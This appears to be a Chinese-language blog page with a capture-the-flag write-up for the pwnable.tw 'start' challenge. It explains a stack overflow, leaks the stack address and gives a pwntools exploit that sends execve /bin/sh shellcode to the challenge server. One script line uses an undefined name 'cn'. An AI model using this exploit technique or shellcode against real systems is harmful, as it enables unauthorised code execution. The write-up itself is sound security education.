<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  <title>Pwnable.tm题解 | Peterpan0927&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="simple pwn">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwnable.tm题解">
<meta property="og:url" content="https://peterpan980927.cn/2019/06/21/Pwnable-tm题解/index.html">
<meta property="og:site_name" content="Peterpan0927&#39;s Blog">
<meta property="og:description" content="simple pwn">
<meta property="og:locale" content="English">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/21/ZSJvrV.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/21/ZSYiG9.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/21/ZSYVr6.png">
<meta property="og:updated_time" content="2019-10-15T04:06:21.587Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Pwnable.tm题解">
<meta name="twitter:description" content="simple pwn">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/06/21/ZSJvrV.png">
  
    <link rel="alternate" href="/atom.xml" title="Peterpan0927&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/p1.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/plugin/bganimation/bg.css">
  

</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <div class="outer">
        <div class="widget-wrap mobile-header">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://pbs.twimg.com/profile_images/1096645032407269376/9cO9fRMm_400x400.png">
    <h2 class="author">Peterpan0927</h2>
    <h3 class="description">how to reach the steins gate?</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>5</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>3</strong><br>标签</div></a>
    </div>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/about" title="About">
            <li>关于</li>
          </a>
        
    </ul>
  </div>
</div>

        <section id="main"><article id="post-Pwnable-tm题解" class="wow slideInRight article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/06/21/Pwnable-tm题解/" class="article-date">
  <time class="post-time" datetime="2019-06-21T09:38:52.000Z" itemprop="datePublished">
    <span class="post-month">6月</span><br/>
    <span class="post-day">21</span>
  </time>
</a>
   
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Pwnable.tm题解
    </h1>
  

        <div>
          
          
              
  &nbsp; | &nbsp;
  <div class="view-box">
    <span id="/2019/06/21/Pwnable-tm题解/" class="leancloud_visitors" data-flag-title="Pwnable.tm题解">
      &nbsp;阅读次数<span class="leancloud-visitors-count"></span>
    </span>
  </div>


          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>simple pwn</p>
<a id="more"></a>
<h1 id="Pwnable-tw题解"><a href="#Pwnable-tw题解" class="headerlink" title="Pwnable.tw题解"></a>Pwnable.tw题解</h1><p>最近重建了博客，放了一下之前写的，通过科学上网体验更佳，有些图我用Twitter做的外链</p>
<h2 id="start"><a href="#start" class="headerlink" title="start"></a>start</h2><p>这道题目网上有很多的题解，但是基本都没有说的很清楚，所以我决定以非常入门，非常清晰的思路去讲解一下这道<code>Pwn</code>的入门题目：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">public _start</span><br><span class="line">_start proc near</span><br><span class="line">push    esp</span><br><span class="line">push    offset _exit</span><br><span class="line">xor     eax, eax</span><br><span class="line">xor     ebx, ebx</span><br><span class="line">xor     ecx, ecx</span><br><span class="line">xor     edx, edx</span><br><span class="line">push    3A465443h</span><br><span class="line">push    20656874h</span><br><span class="line">push    20747261h</span><br><span class="line">push    74732073h</span><br><span class="line">push    2774654Ch</span><br><span class="line">mov     ecx, esp        ; addr</span><br><span class="line">mov     dl, 14h         ; len</span><br><span class="line">mov     bl, 1           ; fd</span><br><span class="line">mov     al, 4</span><br><span class="line">int     80h             ; LINUX - sys_write</span><br><span class="line">xor     ebx, ebx</span><br><span class="line">mov     dl, 3Ch</span><br><span class="line">mov     al, 3</span><br><span class="line">int     80h             ; LINUX - sys_read</span><br><span class="line">add     esp, 14h</span><br><span class="line">retn</span><br></pre></td></tr></table></figure>
<p>直接来上汇编代码吧，这其中有三个系统调用，并且没有<code>main</code>函数，所以应该是内联汇编写的，大概翻译一下就是：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//read 和 write 系统调用都是采用中断的方式调用的</span></span><br><span class="line">write(<span class="number">1</span>,buf,<span class="number">0x14</span>);</span><br><span class="line">read(<span class="number">0</span>,buf,<span class="number">0x3c</span>);</span><br><span class="line"><span class="built_in">exit</span>();</span><br></pre></td></tr></table></figure>
<p>这个时候的栈结构大概就是（至于为什么是这样就不解释了）：</p>
<p><img src="https://s2.ax1x.com/2019/06/21/ZSJvrV.png" alt></p>
<p><code>write</code>系统调用的作用就是把当前栈顶的数据给打印出来，<code>bin</code>里的调用打印长度为<code>0x14</code>，这也就刚好和我们看到的对上了，但是下面的<code>read</code>系统调用却可以读进<code>0x3c</code>个字节，显然会造成一个栈溢出，所以首先我们要做的就是<code>leak</code>基址</p>
<p>因为<code>write</code>可以打印栈顶<code>0x14</code>的数据，所以应该劫持控制流到这个函数的位置，所以我们第一步构造的<code>payload</code>应该为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 'A'*20是因为有add esp,0x14，sys_write_addr可以从ida中获取</span></span><br><span class="line">payload = <span class="string">'A'</span>*<span class="number">20</span> + sys_write_addr</span><br></pre></td></tr></table></figure>
<p>这样当继续执行汇编指令到<code>add esp,0x14</code>是，此时<code>esp</code>就指向原来的<code>exit</code>，此时已经被<code>sys_write_addr</code>覆盖，然后执行<code>ret</code>，将栈顶弹给<code>eip</code>，相当于跳回了：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mov     ecx, esp        ; addr			&lt;-------jmp_addr</span><br><span class="line">mov     dl, 14h         ; len</span><br><span class="line">mov     bl, 1           ; fd</span><br><span class="line">mov     al, 4</span><br><span class="line">int     80h             ; LINUX - sys_write</span><br></pre></td></tr></table></figure>
<p>因为<code>ret</code>相当于<code>pop esp</code>，所以此时<code>esp</code>应该指向最早<code>push</code>的那个<code>esp</code>，通过<code>gdb-peda</code>调试我们可以发现最早<code>push</code>进栈的那个<code>esp</code>中存储的是自己下面的那个数的地址，此刻的栈状况应该为：</p>
<p><img src="https://s2.ax1x.com/2019/06/21/ZSYiG9.png" alt></p>
<p>然后执行<code>sys_write</code>，就会打印出来：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//这里的esp为最早push的esp值,指向0x1</span></span><br><span class="line">esp | <span class="number">0x1</span> | xxx | xxx | xxx</span><br></pre></td></tr></table></figure>
<p>接着又会进入到<code>sys_read</code>了，一定要记住一点，<code>sys_read</code>也是从当前栈顶开始读入，因为我在看其他人的题解的时候就发现有人犯了这样的错误，认为接下来的<code>read</code>还是从原来的栈顶开始读入，参考连接：</p>
<blockquote>
<p><a href="https://blog.csdn.net/qq_35661990/article/details/82913196" target="_blank" rel="noopener">https://blog.csdn.net/qq_35661990/article/details/82913196</a></p>
</blockquote>
<p>CSDN上还有一些其他题解，要么就是没讲到这个点上，要么就是说的是错的，所以在这里我着重强调了一下</p>
<p>接下来我们又有一次输入的机会，因为同样有<code>add esp, 0x14</code>，所以同样要构造<code>&#39;A&#39; * 20</code>，接下来应该是<code>shellcode</code>的地址，也就是一个指向自身地址+<code>0x4</code>的值，而<code>esp</code>刚好满足这个条件，但是还要根据<code>offset</code>调整一下，我画张图应该就能理解了：</p>
<p><img src="https://s2.ax1x.com/2019/06/21/ZSYVr6.png" alt></p>
<p>我自己假设了一些地址，就是为了更方便理解，这样子我相信大家应该都不会有什么疑惑了，顺带提一点，我们的<code>shellcode</code>长度不能超过<code>0x3c-0x14-0x4</code></p>
<p>然后放一下我的poc吧：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">conn = remote(<span class="string">'chall.pwnable.tw'</span>, <span class="number">10000</span>)</span><br><span class="line">conn.recv()</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">20</span>+p32(<span class="number">0x08048087</span>) <span class="comment">#0x08048087为ida中 mov ecx, esp这一行的地址</span></span><br><span class="line">conn.send(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment">#data为esp的值</span></span><br><span class="line">data = u32(cn.recv()[:<span class="number">4</span>])</span><br><span class="line">shellcode_addr = data+<span class="number">0x14</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">20</span>+p32(shellcode_addr)+<span class="string">"\x31\xc0\x50\x68\x2f\x2f\x73"</span>\</span><br><span class="line">                   <span class="string">"\x68\x68\x2f\x62\x69\x6e\x89"</span>\</span><br><span class="line">                   <span class="string">"\xe3\x89\xc1\x89\xc2\xb0\x0b"</span>\</span><br><span class="line">                   <span class="string">"\xcd\x80\x31\xc0\x40\xcd\x80"</span></span><br><span class="line">conn.send(payload)</span><br><span class="line">conn.interactive()</span><br></pre></td></tr></table></figure>
      
    </div>
    <footer class="article-footer">
      <a data-url="https://peterpan980927.cn/2019/06/21/Pwnable-tm题解/" data-id="ck6uoaoc50005pbpk6wufboi4" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/">CTF</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/07/08/JavaScript-in-V8/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          JavaScript in V8
        
      </div>
    </a>
  
  
</nav>

  
</article>



</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <h1 class="blog-title">Peterpan0927&#39;s Blog</h1>
    <h2 class="blog-subtitle">Mind over muscle.</h2>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/about" title="About">
            <li>关于</li>
          </a>
        
    </ul>
  </div>
</div>

  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://pbs.twimg.com/profile_images/1096645032407269376/9cO9fRMm_400x400.png">
    <h2 class="author">Peterpan0927</h2>
    <h3 class="description">how to reach the steins gate?</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>5</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>3</strong><br>标签</div></a>
    </div>



    <div class="social-link">
      
        <a class="hvr-bounce-in" href="http://github.com/Peterpan0927" target="_blank" title="Github">
          Github
        </a>
      
    </div>

    <div class="friend-link">
      <h2>Links</h2>
      
        <a class="hvr-bounce-in" href="https://www.imbajin.com" target="_blank" title="Jin">
          Jin
        </a>
      
        <a class="hvr-bounce-in" href="https://yinwang0.wordpress.com" target="_blank" title="Yinwang(English)">
          Yinwang(English)
        </a>
      
        <a class="hvr-bounce-in" href="http://www.yinwang.org" target="_blank" title="Yinwang(Chinese)">
          Yinwang(Chinese)
        </a>
      
        <a class="hvr-bounce-in" href="https://gloxec.github.io/" target="_blank" title="gloxec">
          gloxec
        </a>
      
    </div>
  </div>
</div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy;2019 - 2020 Peterpan0927<br>
      由<a href="http://hexo.io/" target="_blank">Hexo</a>强力驱动 | 
      主题-<a href="https://github.com/ShanaMaid/hexo-theme-shana">Shana</a>
      
    </div>
    
  </div>
</footer>
    </div>
    

<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//apps.bdimg.com/libs/wow/0.1.6/wow.min.js"></script>
<script>
new WOW().init();
</script>   


  <link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">
  <script src="/plugin/fancybox/jquery.fancybox.pack.js"></script>



  <link rel="stylesheet" href="/plugin/galmenu/GalMenu.css">
  <script src="/plugin/galmenu/GalMenu.js"></script>
  <div class="GalMenu GalDropDown">
      <div class="circle" id="gal">
        <div class="ring">
          
            <a href="/" title="" class="menuItem">HomePage</a>
          
            <a href="/tags" title="" class="menuItem">Tag</a>
          
            <a href="/about" title="" class="menuItem">About</a>
          
            <a href="/archives" title="" class="menuItem">Archives</a>
          
            <a href="https://github.com/Peterpan0927" title="" class="menuItem">Github</a>
          
            <a href="ftp://118.89.38.168" title="" class="menuItem">FTP</a>
          
        </div>
        
          <audio id="audio" src="plugin/galmenu/wulusai.mp3"></audio>
        
      </div> 
</div>
<div id="overlay" style="opacity: 1; cursor: pointer;"></div>
  <script type="text/javascript">var items = document.querySelectorAll('.menuItem');
    for (var i = 0,
    l = items.length; i < l; i++) {
      items[i].style.left = (50 - 35 * Math.cos( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%";
      items[i].style.top = (50 + 35 * Math.sin( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%"
    }</script>
<script type="text/javascript">
  $(document).ready(function() {
    $('body').GalMenu({
      'menu': 'GalDropDown'
    })
  });
</script>

  <section class="hidden-xs"> 
  <ul class="cb-slideshow"> 
    <li><span>苟利</span></li> 
    <li><span>国家</span></li> 
    <li><span>生死以</span></li> 
    <li><span>岂能</span></li> 
    <li><span>祸福</span></li> 
    <li><span>趋避之</span></li> 
  </ul>
</section>
<script src="/js/script.js"></script>




  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("Ljd6bJFL9N4tWj6WnGcbYUd2-gzGzoHsz", "xDGMWtxNt0aReJDVkuYmSqBd");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.article-title').length > 1) {
        showTime(Counter);
      }
    });
  </script>





  </div>
</body>
</html>